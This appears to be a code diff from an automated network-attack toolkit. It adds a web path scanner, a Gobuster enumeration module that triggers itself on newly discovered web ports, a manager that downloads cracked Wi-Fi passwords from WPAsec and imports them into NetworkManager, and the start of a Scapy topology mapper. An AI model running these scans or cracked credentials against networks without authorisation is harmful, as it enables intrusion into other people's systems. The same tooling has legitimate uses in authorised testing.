||||
|
||||
# Save discovered paths
|
||||
if self.discovered_paths:
|
||||
paths_file = os.path.join(self.output_dir, f"paths_{timestamp}.json")
|
||||
with open(paths_file, 'w') as f:
|
||||
json.dump(list(self.discovered_paths), f, indent=4)
|
||||
|
||||
# Save vulnerabilities
|
||||
if self.vulnerabilities:
|
||||
vulns_file = os.path.join(self.output_dir, f"vulnerabilities_{timestamp}.json")
|
||||
with open(vulns_file, 'w') as f:
|
||||
json.dump(self.vulnerabilities, f, indent=4)
|
||||
|
||||
# Save form analysis
|
||||
if self.forms:
|
||||
forms_file = os.path.join(self.output_dir, f"forms_{timestamp}.json")
|
||||
with open(forms_file, 'w') as f:
|
||||
json.dump(self.forms, f, indent=4)
|
||||
|
||||
logging.info(f"Results saved to {self.output_dir}")
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save results: {e}")
|
||||
|
||||
def execute(self):
|
||||
"""Execute the web application scan."""
|
||||
try:
|
||||
logging.info(f"Starting web scan on {self.base_url}")
|
||||
paths = self.load_wordlist()
|
||||
|
||||
with ThreadPoolExecutor(max_workers=self.threads) as executor:
|
||||
executor.map(self.scan_path, paths)
|
||||
|
||||
self.save_results()
|
||||
|
||||
except Exception as e:
|
||||
logging.error(f"Scan error: {e}")
|
||||
finally:
|
||||
self.session.close()
|
||||
|
||||
def save_settings(url, wordlist, output_dir, threads, delay):
|
||||
"""Save settings to JSON file."""
|
||||
try:
|
||||
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {
|
||||
"url": url,
|
||||
"wordlist": wordlist,
|
||||
"output_dir": output_dir,
|
||||
"threads": threads,
|
||||
"delay": delay
|
||||
}
|
||||
with open(SETTINGS_FILE, 'w') as f:
|
||||
json.dump(settings, f)
|
||||
logging.info(f"Settings saved to {SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save settings: {e}")
|
||||
|
||||
def load_settings():
|
||||
"""Load settings from JSON file."""
|
||||
if os.path.exists(SETTINGS_FILE):
|
||||
try:
|
||||
with open(SETTINGS_FILE, 'r') as f:
|
||||
return json.load(f)
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load settings: {e}")
|
||||
return {}
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Web application vulnerability scanner")
|
||||
parser.add_argument("-u", "--url", help="Target URL to scan")
|
||||
parser.add_argument("-w", "--wordlist", help="Path to directory wordlist")
|
||||
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
|
||||
parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads")
|
||||
parser.add_argument("-d", "--delay", type=float, default=0.1, help="Delay between requests")
|
||||
args = parser.parse_args()
|
||||
|
||||
settings = load_settings()
|
||||
url = args.url or settings.get("url")
|
||||
wordlist = args.wordlist or settings.get("wordlist")
|
||||
output_dir = args.output or settings.get("output_dir")
|
||||
threads = args.threads or settings.get("threads")
|
||||
delay = args.delay or settings.get("delay")
|
||||
|
||||
if not url:
|
||||
logging.error("URL is required. Use -u or save it in settings")
|
||||
return
|
||||
|
||||
save_settings(url, wordlist, output_dir, threads, delay)
|
||||
|
||||
scanner = ValkyieScout(
|
||||
url=url,
|
||||
wordlist=wordlist,
|
||||
output_dir=output_dir,
|
||||
threads=threads,
|
||||
delay=delay
|
||||
)
|
||||
scanner.execute()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
297
resources/default_config/actions/web_enum.py
Normal file
@@ -0,0 +1,297 @@
|
||||
#!/usr/bin/env python3
|
||||
# -*- coding: utf-8 -*-
|
||||
"""
|
||||
web_enum.py — Gobuster Web Enumeration -> DB writer for table `webenum`.
|
||||
|
||||
- Writes each finding into the `webenum` table
|
||||
- ON CONFLICT(mac_address, ip, port, directory) DO UPDATE
|
||||
- Respects orchestrator stop flag (shared_data.orchestrator_should_exit)
|
||||
- No filesystem output: parse Gobuster stdout directly
|
||||
"""
|
||||
|
||||
import re
|
||||
import socket
|
||||
import subprocess
|
||||
import threading
|
||||
import logging
|
||||
from typing import List, Dict, Tuple, Optional
|
||||
|
||||
from shared import SharedData
|
||||
from logger import Logger
|
||||
|
||||
# -------------------- Logger & module meta --------------------
|
||||
logger = Logger(name="web_enum.py", level=logging.DEBUG)
|
||||
|
||||
b_class = "WebEnumeration"
|
||||
b_module = "web_enum"
|
||||
b_status = "WebEnumeration"
|
||||
b_port = 80
|
||||
b_service = '["http","https"]'
|
||||
b_trigger = 'on_any:["on_web_service","on_new_port:80","on_new_port:443","on_new_port:8080","on_new_port:8443","on_new_port:9443","on_new_port:8000","on_new_port:8888","on_new_port:81","on_new_port:5000","on_new_port:5001","on_new_port:7080","on_new_port:9080"]'
|
||||
b_parent = None
|
||||
b_priority = 90 # adjust if needed
|
||||
b_cooldown = 1800 # 30 minutes between runs
|
||||
b_rate_limit = '3/86400' # 3 times per day max
|
||||
b_enabled = 0
|
||||
|
||||
# -------------------- Status parsing helpers --------------------
|
||||
VALID_STATUS_CODES = {
|
||||
200: "OK", 201: "Created", 204: "No Content",
|
||||
301: "Moved Permanently", 302: "Found (Temp Redirect)",
|
||||
303: "See Other", 307: "Temporary Redirect", 308: "Permanent Redirect",
|
||||
401: "Unauthorized", 403: "Forbidden", 405: "Method Not Allowed"
|
||||
}
|
||||
ANSI_RE = re.compile(r"\x1B\[[0-?]*[ -/]*[@-~]")
|
||||
CTL_RE = re.compile(r"[\x00-\x1F\x7F]") # non-printables
|
||||
|
||||
# Gobuster "dir" line examples handled:
|
||||
# /admin (Status: 301) [Size: 310] [--> http://10.0.0.5/admin/]
|
||||
# /images (Status: 200) [Size: 12345]
|
||||
GOBUSTER_LINE = re.compile(
|
||||
r"""^(?P<path>\S+)\s*
|
||||
\(Status:\s*(?P<status>\d{3})\)\s*
|
||||
(?:\[Size:\s*(?P<size>\d+)\])?
|
||||
(?:\s*\[\-\-\>\s*(?P<redir>[^\]]+)\])?
|
||||
""",
|
||||
re.VERBOSE
|
||||
)
|
||||
|
||||
|
||||
class WebEnumeration:
|
||||
"""
|
||||
Orchestrates Gobuster web dir enum and writes normalized results into DB.
|
||||
In-memory only: no CSV, no temp files.
|
||||
"""
|
||||
def __init__(self, shared_data: SharedData):
|
||||
self.shared_data = shared_data
|
||||
self.gobuster_path = "/usr/bin/gobuster" # verify with `which gobuster`
|
||||
self.wordlist = self.shared_data.common_wordlist
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# ---- Sanity checks
|
||||
import os
|
||||
if not os.path.exists(self.gobuster_path):
|
||||
raise FileNotFoundError(f"Gobuster not found at {self.gobuster_path}")
|
||||
if not os.path.exists(self.wordlist):
|
||||
raise FileNotFoundError(f"Wordlist not found: {self.wordlist}")
|
||||
|
||||
logger.info("WebEnumeration initialized (stdout mode, no files).")
|
||||
|
||||
# -------------------- Utilities --------------------
|
||||
def _scheme_for_port(self, port: int) -> str:
|
||||
https_ports = {443, 8443, 9443, 10443, 9444, 5000, 5001, 7080, 9080}
|
||||
return "https" if int(port) in https_ports else "http"
|
||||
|
||||
|
||||
def _reverse_dns(self, ip: str) -> Optional[str]:
|
||||
try:
|
||||
name, _, _ = socket.gethostbyaddr(ip)
|
||||
return name
|
||||
except Exception:
|
||||
return None
|
||||
|
||||
def _extract_identity(self, row: Dict) -> Tuple[str, Optional[str]]:
|
||||
"""Return (mac_address, hostname) from a row with tolerant keys."""
|
||||
mac = row.get("mac_address") or row.get("mac") or row.get("MAC") or ""
|
||||
hostname = row.get("hostname") or row.get("Hostname") or None
|
||||
return str(mac), (str(hostname) if hostname else None)
|
||||
|
||||
# -------------------- DB Writer --------------------
|
||||
def _db_add_result(self,
|
||||
mac_address: str,
|
||||
ip: str,
|
||||
hostname: Optional[str],
|
||||
port: int,
|
||||
directory: str,
|
||||
status: int,
|
||||
size: int = 0,
|
||||
response_time: int = 0,
|
||||
content_type: Optional[str] = None,
|
||||
tool: str = "gobuster") -> None:
|
||||
"""Upsert a single record into `webenum`."""
|
||||
try:
|
||||
self.shared_data.db.execute("""
|
||||
INSERT INTO webenum (
|
||||
mac_address, ip, hostname, port, directory, status,
|
||||
size, response_time, content_type, tool, is_active
|
||||
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, 1)
|
||||
ON CONFLICT(mac_address, ip, port, directory) DO UPDATE SET
|
||||
status = excluded.status,
|
||||
size = excluded.size,
|
||||
response_time = excluded.response_time,
|
||||
content_type = excluded.content_type,
|
||||
hostname = COALESCE(excluded.hostname, webenum.hostname),
|
||||
tool = COALESCE(excluded.tool, webenum.tool),
|
||||
last_seen = CURRENT_TIMESTAMP,
|
||||
is_active = 1
|
||||
""", (mac_address, ip, hostname, int(port), directory, int(status),
|
||||
int(size or 0), int(response_time or 0), content_type, tool))
|
||||
logger.debug(f"DB upsert: {ip}:{port}{directory} -> {status} (size={size})")
|
||||
except Exception as e:
|
||||
logger.error(f"DB insert error for {ip}:{port}{directory}: {e}")
|
||||
|
||||
# -------------------- Gobuster runner (stdout) --------------------
|
||||
def _run_gobuster_stdout(self, url: str) -> Optional[str]:
|
||||
base_cmd = [
|
||||
self.gobuster_path, "dir",
|
||||
"-u", url,
|
||||
"-w", self.wordlist,
|
||||
"-t", "10",
|
||||
"--quiet",
|
||||
"--no-color",
|
||||
]
|
||||
|
||||
def run(cmd):
|
||||
return subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
|
||||
|
||||
# Try with -z first
|
||||
cmd = base_cmd + ["-z"]
|
||||
logger.info(f"Running Gobuster on {url}...")
|
||||
try:
|
||||
res = run(cmd)
|
||||
if res.returncode == 0:
|
||||
logger.success(f"Gobuster OK on {url}")
|
||||
return res.stdout or ""
|
||||
# Fallback if -z is unknown
|
||||
if "unknown flag" in (res.stderr or "").lower() or "invalid" in (res.stderr or "").lower():
|
||||
logger.info("Gobuster doesn't support -z, retrying without it.")
|
||||
res2 = run(base_cmd)
|
||||
if res2.returncode == 0:
|
||||
logger.success(f"Gobuster OK on {url} (no -z)")
|
||||
return res2.stdout or ""
|
||||
logger.info(f"Gobuster failed on {url}: {res2.stderr.strip()}")
|
||||
return None
|
||||
logger.info(f"Gobuster failed on {url}: {res.stderr.strip()}")
|
||||
return None
|
||||
except Exception as e:
|
||||
logger.error(f"Gobuster exception on {url}: {e}")
|
||||
return None
|
||||
|
||||
|
||||
def _parse_gobuster_text(self, text: str) -> List[Dict]:
|
||||
"""
|
||||
Parse gobuster stdout lines into entries:
|
||||
{ 'path': '/admin', 'status': 301, 'size': 310, 'redirect': 'http://...'|None }
|
||||
"""
|
||||
entries: List[Dict] = []
|
||||
if not text:
|
||||
return entries
|
||||
|
||||
for raw in text.splitlines():
|
||||
# 1) strip ANSI/control BEFORE regex
|
||||
line = ANSI_RE.sub("", raw)
|
||||
line = CTL_RE.sub("", line)
|
||||
line = line.strip()
|
||||
if not line:
|
||||
continue
|
||||
|
||||
m = GOBUSTER_LINE.match(line)
|
||||
if not m:
|
||||
logger.debug(f"Unparsed line: {line}")
|
||||
continue
|
||||
|
||||
# 2) extract all fields NOW
|
||||
path = m.group("path") or ""
|
||||
status = int(m.group("status"))
|
||||
size = int(m.group("size") or 0)
|
||||
redir = m.group("redir")
|
||||
|
||||
# 3) normalize path
|
||||
if not path.startswith("/"):
|
||||
path = "/" + path
|
||||
path = "/" + path.strip("/")
|
||||
|
||||
entries.append({
|
||||
"path": path,
|
||||
"status": status,
|
||||
"size": size,
|
||||
"redirect": redir.strip() if redir else None
|
||||
})
|
||||
|
||||
logger.info(f"Parsed {len(entries)} entries from gobuster stdout")
|
||||
return entries
|
||||
|
||||
# -------------------- Public API --------------------
|
||||
def execute(self, ip: str, port: int, row: Dict, status_key: str) -> str:
|
||||
"""
|
||||
Run gobuster on (ip,port), parse stdout, upsert each finding into DB.
|
||||
Returns: 'success' | 'failed' | 'interrupted'
|
||||
"""
|
||||
try:
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Interrupted before start (orchestrator flag).")
|
||||
return "interrupted"
|
||||
|
||||
scheme = self._scheme_for_port(port)
|
||||
base_url = f"{scheme}://{ip}:{port}"
|
||||
logger.info(f"Enumerating {base_url} ...")
|
||||
self.shared_data.bjornorch_status = "WebEnumeration"
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Interrupted before gobuster run.")
|
||||
return "interrupted"
|
||||
|
||||
stdout_text = self._run_gobuster_stdout(base_url)
|
||||
if stdout_text is None:
|
||||
return "failed"
|
||||
|
||||
if self.shared_data.orchestrator_should_exit:
|
||||
logger.info("Interrupted after gobuster run (stdout captured).")
|
||||
return "interrupted"
|
||||
|
||||
entries = self._parse_gobuster_text(stdout_text)
|
||||
if not entries:
|
||||
logger.warning(f"No entries for {base_url}.")
|
||||
return "success" # scan ran fine but no findings
|
||||
|
||||
mac_address, hostname = self._extract_identity(row)
|
||||
if not hostname:
|
||||
hostname = self._reverse_dns(ip)
|
||||
|
||||
for e in entries:
|
||||
self._db_add_result(
|
||||
mac_address=mac_address,
|
||||
ip=ip,
|
||||
hostname=hostname,
|
||||
port=port,
|
||||
directory=e["path"],
|
||||
status=e["status"],
|
||||
size=e.get("size", 0),
|
||||
response_time=0, # gobuster doesn't expose timing here
|
||||
content_type=None, # unknown here; a later HEAD/GET probe can fill it
|
||||
tool="gobuster"
|
||||
)
|
||||
|
||||
return "success"
|
||||
|
||||
except Exception as e:
|
||||
logger.error(f"Execute error on {ip}:{port}: {e}")
|
||||
return "failed"
|
||||
|
||||
|
||||
# -------------------- CLI mode (debug/manual) --------------------
|
||||
if __name__ == "__main__":
|
||||
shared_data = SharedData()
|
||||
try:
|
||||
web_enum = WebEnumeration(shared_data)
|
||||
logger.info("Starting web directory enumeration...")
|
||||
|
||||
rows = shared_data.read_data()
|
||||
for row in rows:
|
||||
ip = row.get("IPs") or row.get("ip")
|
||||
if not ip:
|
||||
continue
|
||||
port = row.get("port") or 80
|
||||
logger.info(f"Execute WebEnumeration on {ip}:{port} ...")
|
||||
status = web_enum.execute(ip, int(port), row, "enum_web_directories")
|
||||
if status == "success":
|
||||
logger.success(f"Enumeration successful for {ip}:{port}.")
|
||||
elif status == "interrupted":
|
||||
logger.warning(f"Enumeration interrupted for {ip}:{port}.")
|
||||
break
|
||||
else:
|
||||
logger.failed(f"Enumeration failed for {ip}:{port}.")
|
||||
|
||||
logger.info("Web directory enumeration completed.")
|
||||
except Exception as e:
|
||||
logger.error(f"General execution error: {e}")
|
||||
317
resources/default_config/actions/wpasec_potfiles.py
Normal file
@@ -0,0 +1,317 @@
|
||||
# wpasec_potfiles.py
|
||||
# WPAsec Potfile Manager - Download, clean, import, or erase WiFi credentials
|
||||
|
||||
import os
|
||||
import json
|
||||
import glob
|
||||
import argparse
|
||||
import requests
|
||||
import subprocess
|
||||
from datetime import datetime
|
||||
import logging
|
||||
|
||||
# ── METADATA / UI FOR NEO LAUNCHER ────────────────────────────────────────────
|
||||
b_class = "WPAsecPotfileManager"
|
||||
b_module = "wpasec_potfiles"
|
||||
b_enabled = 1
|
||||
b_action = "normal" # normal | aggressive | stealth
|
||||
b_category = "wifi"
|
||||
b_name = "WPAsec Potfile Manager"
|
||||
b_description = (
|
||||
"Download, clean, import, or erase Wi-Fi networks from WPAsec potfiles. "
|
||||
"Options: download (default if API key is set), clean, import, erase."
|
||||
)
|
||||
b_author = "Fabien / Cyberviking"
|
||||
b_version = "1.0.0"
|
||||
b_icon = f"/actions_icons/{b_class}.png"
|
||||
b_docs_url = "https://wpa-sec.stanev.org/?api"
|
||||
|
||||
b_args = {
|
||||
"key": {
|
||||
"type": "text",
|
||||
"label": "API key (WPAsec)",
|
||||
"placeholder": "wpa-sec api key",
|
||||
"secret": True,
|
||||
"help": "API key used to download the potfile. If empty, the saved key is reused."
|
||||
},
|
||||
"directory": {
|
||||
"type": "text",
|
||||
"label": "Potfiles directory",
|
||||
"default": "/home/bjorn/Bjorn/data/input/potfiles",
|
||||
"placeholder": "/path/to/potfiles",
|
||||
"help": "Directory containing/receiving .pot / .potfile files."
|
||||
},
|
||||
"clean": {
|
||||
"type": "checkbox",
|
||||
"label": "Clean potfiles directory",
|
||||
"default": False,
|
||||
"help": "Delete all files in the potfiles directory."
|
||||
},
|
||||
"import_potfiles": {
|
||||
"type": "checkbox",
|
||||
"label": "Import potfiles into NetworkManager",
|
||||
"default": False,
|
||||
"help": "Add Wi-Fi networks found in potfiles via nmcli (avoiding duplicates)."
|
||||
},
|
||||
"erase": {
|
||||
"type": "checkbox",
|
||||
"label": "Erase Wi-Fi connections from potfiles",
|
||||
"default": False,
|
||||
"help": "Delete via nmcli the Wi-Fi networks listed in potfiles (avoiding duplicates)."
|
||||
}
|
||||
}
|
||||
|
||||
b_examples = [
|
||||
{"directory": "/home/bjorn/Bjorn/data/input/potfiles"},
|
||||
{"key": "YOUR_API_KEY_HERE", "directory": "/home/bjorn/Bjorn/data/input/potfiles"},
|
||||
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True},
|
||||
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "import_potfiles": True},
|
||||
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "erase": True},
|
||||
{"directory": "/home/bjorn/Bjorn/data/input/potfiles", "clean": True, "import_potfiles": True},
|
||||
]
|
||||
|
||||
|
||||
def compute_dynamic_b_args(base: dict) -> dict:
|
||||
"""
|
||||
Enrich dynamic UI arguments:
|
||||
- Pre-fill the API key if previously saved.
|
||||
- Show info about the number of potfiles in the chosen directory.
|
||||
"""
|
||||
d = dict(base or {})
|
||||
try:
|
||||
settings_path = os.path.join(
|
||||
os.path.expanduser("~"), ".settings_bjorn", "wpasec_settings.json"
|
||||
)
|
||||
if os.path.exists(settings_path):
|
||||
with open(settings_path, "r", encoding="utf-8") as f:
|
||||
saved = json.load(f)
|
||||
saved_key = (saved or {}).get("api_key")
|
||||
if saved_key and not d.get("key", {}).get("default"):
|
||||
d.setdefault("key", {}).setdefault("default", saved_key)
|
||||
d["key"]["help"] = (d["key"].get("help") or "") + " (auto-detected)"
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
try:
|
||||
directory = d.get("directory", {}).get("default") or "/home/bjorn/Bjorn/data/input/potfiles"
|
||||
exists = os.path.isdir(directory)
|
||||
count = 0
|
||||
if exists:
|
||||
count = len(glob.glob(os.path.join(directory, "*.pot"))) + \
|
||||
len(glob.glob(os.path.join(directory, "*.potfile")))
|
||||
extra = f" | Found: {count} potfile(s)" if exists else " | (directory does not exist yet)"
|
||||
d["directory"]["help"] = (d["directory"].get("help") or "") + extra
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
return d
|
||||
|
||||
|
||||
# ── CLASS IMPLEMENTATION ─────────────────────────────────────────────────────
|
||||
class WPAsecPotfileManager:
|
||||
DEFAULT_SAVE_DIR = "/home/bjorn/Bjorn/data/input/potfiles"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "wpasec_settings.json")
|
||||
DOWNLOAD_URL = "https://wpa-sec.stanev.org/?api&dl=1"
|
||||
|
||||
def __init__(self, shared_data):
|
||||
"""
|
||||
Orchestrator always passes shared_data.
|
||||
Even if unused here, we store it for compatibility.
|
||||
"""
|
||||
self.shared_data = shared_data
|
||||
logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(levelname)s - %(message)s")
|
||||
|
||||
# --- Orchestrator entry point ---
|
||||
def execute(self, ip=None, port=None, row=None, status_key=None):
|
||||
"""
|
||||
Entry point for orchestrator.
|
||||
By default: download latest potfile if API key is available.
|
||||
"""
|
||||
self.shared_data.bjorn_orch_status = "WPAsecPotfileManager"
|
||||
self.shared_data.comment_params = {"ip": ip, "port": port}
|
||||
|
||||
api_key = self.load_api_key()
|
||||
if api_key:
|
||||
logging.info("WPAsecPotfileManager: downloading latest potfile (orchestrator trigger).")
|
||||
self.download_potfile(self.DEFAULT_SAVE_DIR, api_key)
|
||||
return "success"
|
||||
else:
|
||||
logging.warning("WPAsecPotfileManager: no API key found, nothing done.")
|
||||
return "failed"
|
||||
|
||||
# --- API Key Handling ---
|
||||
def save_api_key(self, api_key: str):
|
||||
"""Save the API key locally."""
|
||||
try:
|
||||
os.makedirs(self.DEFAULT_SETTINGS_DIR, exist_ok=True)
|
||||
settings = {"api_key": api_key}
|
||||
with open(self.SETTINGS_FILE, "w") as file:
|
||||
json.dump(settings, file)
|
||||
logging.info(f"API key saved to {self.SETTINGS_FILE}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to save API key: {e}")
|
||||
|
||||
def load_api_key(self):
|
||||
"""Load the API key from local storage."""
|
||||
if os.path.exists(self.SETTINGS_FILE):
|
||||
try:
|
||||
with open(self.SETTINGS_FILE, "r") as file:
|
||||
settings = json.load(file)
|
||||
return settings.get("api_key")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to load API key: {e}")
|
||||
return None
|
||||
|
||||
# --- Actions ---
|
||||
def download_potfile(self, save_dir, api_key):
|
||||
"""Download the potfile from WPAsec."""
|
||||
try:
|
||||
cookies = {"key": api_key}
|
||||
logging.info(f"Downloading potfile from: {self.DOWNLOAD_URL}")
|
||||
response = requests.get(self.DOWNLOAD_URL, cookies=cookies, stream=True)
|
||||
response.raise_for_status()
|
||||
|
||||
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
|
||||
filename = os.path.join(save_dir, f"potfile_{timestamp}.pot")
|
||||
|
||||
os.makedirs(save_dir, exist_ok=True)
|
||||
with open(filename, "wb") as file:
|
||||
for chunk in response.iter_content(chunk_size=8192):
|
||||
file.write(chunk)
|
||||
|
||||
logging.info(f"Potfile saved to: {filename}")
|
||||
except requests.exceptions.RequestException as e:
|
||||
logging.error(f"Failed to download potfile: {e}")
|
||||
except Exception as e:
|
||||
logging.error(f"Unexpected error: {e}")
|
||||
|
||||
def clean_directory(self, directory):
|
||||
"""Delete all potfiles in the given directory."""
|
||||
try:
|
||||
if os.path.exists(directory):
|
||||
logging.info(f"Cleaning directory: {directory}")
|
||||
for file in os.listdir(directory):
|
||||
file_path = os.path.join(directory, file)
|
||||
if os.path.isfile(file_path):
|
||||
os.remove(file_path)
|
||||
logging.info(f"Deleted: {file_path}")
|
||||
else:
|
||||
logging.info(f"Directory does not exist: {directory}")
|
||||
except Exception as e:
|
||||
logging.error(f"Failed to clean directory {directory}: {e}")
|
||||
|
||||
def import_potfiles(self, directory):
|
||||
"""Import potfiles into NetworkManager using nmcli."""
|
||||
try:
|
||||
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
|
||||
processed_ssids = set()
|
||||
networks_added = []
|
||||
DEFAULT_PRIORITY = 5
|
||||
|
||||
for path in potfile_paths:
|
||||
with open(path, "r") as potfile:
|
||||
for line in potfile:
|
||||
line = line.strip()
|
||||
if ":" not in line:
|
||||
continue
|
||||
ssid, password = self._parse_potfile_line(line)
|
||||
if not ssid or not password or ssid in processed_ssids:
|
||||
continue
|
||||
|
||||
try:
|
||||
subprocess.run(
|
||||
["sudo", "nmcli", "connection", "add", "type", "wifi",
|
||||
"con-name", ssid, "ifname", "*", "ssid", ssid,
|
||||
"wifi-sec.key-mgmt", "wpa-psk", "wifi-sec.psk", password,
|
||||
"connection.autoconnect", "yes",
|
||||
"connection.autoconnect-priority", str(DEFAULT_PRIORITY)],
|
||||
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
|
||||
)
|
||||
processed_ssids.add(ssid)
|
||||
networks_added.append(ssid)
|
||||
logging.info(f"Imported network {ssid}")
|
||||
except subprocess.CalledProcessError as e:
|
||||
logging.error(f"Failed to import {ssid}: {e.stderr.strip()}")
|
||||
|
||||
logging.info(f"Total imported: {networks_added}")
|
||||
except Exception as e:
|
||||
logging.error(f"Unexpected error while importing: {e}")
|
||||
|
||||
def erase_networks(self, directory):
|
||||
"""Erase Wi-Fi connections listed in potfiles using nmcli."""
|
||||
try:
|
||||
potfile_paths = glob.glob(os.path.join(directory, "*.pot")) + glob.glob(os.path.join(directory, "*.potfile"))
|
||||
processed_ssids = set()
|
||||
networks_removed = []
|
||||
|
||||
for path in potfile_paths:
|
||||
with open(path, "r") as potfile:
|
||||
for line in potfile:
|
||||
line = line.strip()
|
||||
if ":" not in line:
|
||||
continue
|
||||
ssid, _ = self._parse_potfile_line(line)
|
||||
if not ssid or ssid in processed_ssids:
|
||||
continue
|
||||
|
||||
try:
|
||||
subprocess.run(
|
||||
["sudo", "nmcli", "connection", "delete", "id", ssid],
|
||||
check=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
|
||||
)
|
||||
processed_ssids.add(ssid)
|
||||
networks_removed.append(ssid)
|
||||
logging.info(f"Deleted network {ssid}")
|
||||
except subprocess.CalledProcessError as e:
|
||||
logging.warning(f"Failed to delete {ssid}: {e.stderr.strip()}")
|
||||
|
||||
logging.info(f"Total deleted: {networks_removed}")
|
||||
except Exception as e:
|
||||
logging.error(f"Unexpected error while erasing: {e}")
|
||||
|
||||
# --- Helpers ---
|
||||
def _parse_potfile_line(self, line: str):
|
||||
"""Parse a potfile line into (ssid, password)."""
|
||||
ssid, password = None, None
|
||||
if line.startswith("$WPAPSK$") and "#" in line:
|
||||
try:
|
||||
ssid_hash, password = line.split(":", 1)
|
||||
ssid = ssid_hash.split("#")[0].replace("$WPAPSK$", "")
|
||||
except ValueError:
|
||||
return None, None
|
||||
elif len(line.split(":")) == 4:
|
||||
try:
|
||||
_, _, ssid, password = line.split(":")
|
||||
except ValueError:
|
||||
return None, None
|
||||
return ssid, password
|
||||
|
||||
# --- CLI ---
|
||||
def run(self, argv=None):
|
||||
parser = argparse.ArgumentParser(description="Manage WPAsec potfiles (download, clean, import, erase).")
|
||||
parser.add_argument("-k", "--key", help="API key for WPAsec (saved locally after first use).")
|
||||
parser.add_argument("-d", "--directory", default=self.DEFAULT_SAVE_DIR, help="Directory for potfiles.")
|
||||
parser.add_argument("-c", "--clean", action="store_true", help="Clean the potfiles directory.")
|
||||
parser.add_argument("-a", "--import-potfiles", action="store_true", help="Import potfiles into NetworkManager.")
|
||||
parser.add_argument("-e", "--erase", action="store_true", help="Erase Wi-Fi connections from potfiles.")
|
||||
args = parser.parse_args(argv)
|
||||
|
||||
api_key = args.key
|
||||
if api_key:
|
||||
self.save_api_key(api_key)
|
||||
else:
|
||||
api_key = self.load_api_key()
|
||||
|
||||
if args.clean:
|
||||
self.clean_directory(args.directory)
|
||||
if args.import_potfiles:
|
||||
self.import_potfiles(args.directory)
|
||||
if args.erase:
|
||||
self.erase_networks(args.directory)
|
||||
if api_key and not args.clean and not args.import_potfiles and not args.erase:
|
||||
self.download_potfile(args.directory, api_key)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
WPAsecPotfileManager(shared_data=None).run()
|
||||
335
resources/default_config/actions/yggdrasil_mapper.py
Normal file
@@ -0,0 +1,335 @@
|
||||
# Network topology mapping tool for discovering and visualizing network segments.
|
||||
# Saves settings in `/home/bjorn/.settings_bjorn/yggdrasil_mapper_settings.json`.
|
||||
# Automatically loads saved settings if arguments are not provided.
|
||||
# -r, --range Network range to scan (CIDR format).
|
||||
# -i, --interface Network interface to use (default: active interface).
|
||||
# -d, --depth Maximum trace depth for routing (default: 5).
|
||||
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/topology).
|
||||
# -t, --timeout Timeout for probes in seconds (default: 2).
|
||||
|
||||
import os
|
||||
import json
|
||||
import argparse
|
||||
from datetime import datetime
|
||||
import logging
|
||||
import subprocess
|
||||
import networkx as nx
|
||||
import matplotlib.pyplot as plt
|
||||
import nmap
|
||||
import scapy.all as scapy
|
||||
from scapy.layers.inet import IP, ICMP, TCP
|
||||
import threading
|
||||
import queue
|
||||
|
||||
|
||||
b_class = "YggdrasilMapper"
|
||||
b_module = "yggdrasil_mapper"
|
||||
b_enabled = 0
|
||||
|
||||
# Configure logging
|
||||
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
|
||||
|
||||
# Default settings
|
||||
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/topology"
|
||||
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
|
||||
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "yggdrasil_mapper_settings.json")
|
||||
|
||||
class YggdrasilMapper:
|
||||
def __init__(self, network_range, interface=None, max_depth=5, output_dir=DEFAULT_OUTPUT_DIR, timeout=2):
|
||||
self.network_range = network_range
|
||||
self.interface = interface or scapy.conf.iface
|
||||
self.max_depth = max_depth
|
||||
self.output_dir = output_dir
|
||||
self.timeout = timeout
|
||||
|
||||
self.graph = nx.Graph()
|
||||
self.hosts = {}
|
||||
self.routes = {}
|
||||
self.lock = threading.Lock()
|
||||
|
||||
# For parallel processing
|
||||
self.queue = queue.Queue()
|
||||
self.results = queue.Queue()
|
||||
|
||||
def discover_hosts(self):
|
||||
"""Discover live hosts in the network range."""
|
||||
try:
|
||||
logging.info(f"Discovering hosts in {self.network_range}")
|
||||
|
||||
# ARP scan for local network
|
||||
arp_request = scapy.ARP(pdst=self.network_range)
|
||||
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
|
||||
packets = broadcast/arp_request
|
||||
|
||||
answered, _ = scapy.srp(packets, timeout=self.timeout, iface=self.interface, verbose=False)
|
||||
|
||||
for sent, received in answered:
|
||||
ip = received.psrc
|
||||
mac = received.hwsrc
|
||||
self.hosts[ip] = {'mac': mac, 'status': 'up'}
|
||||
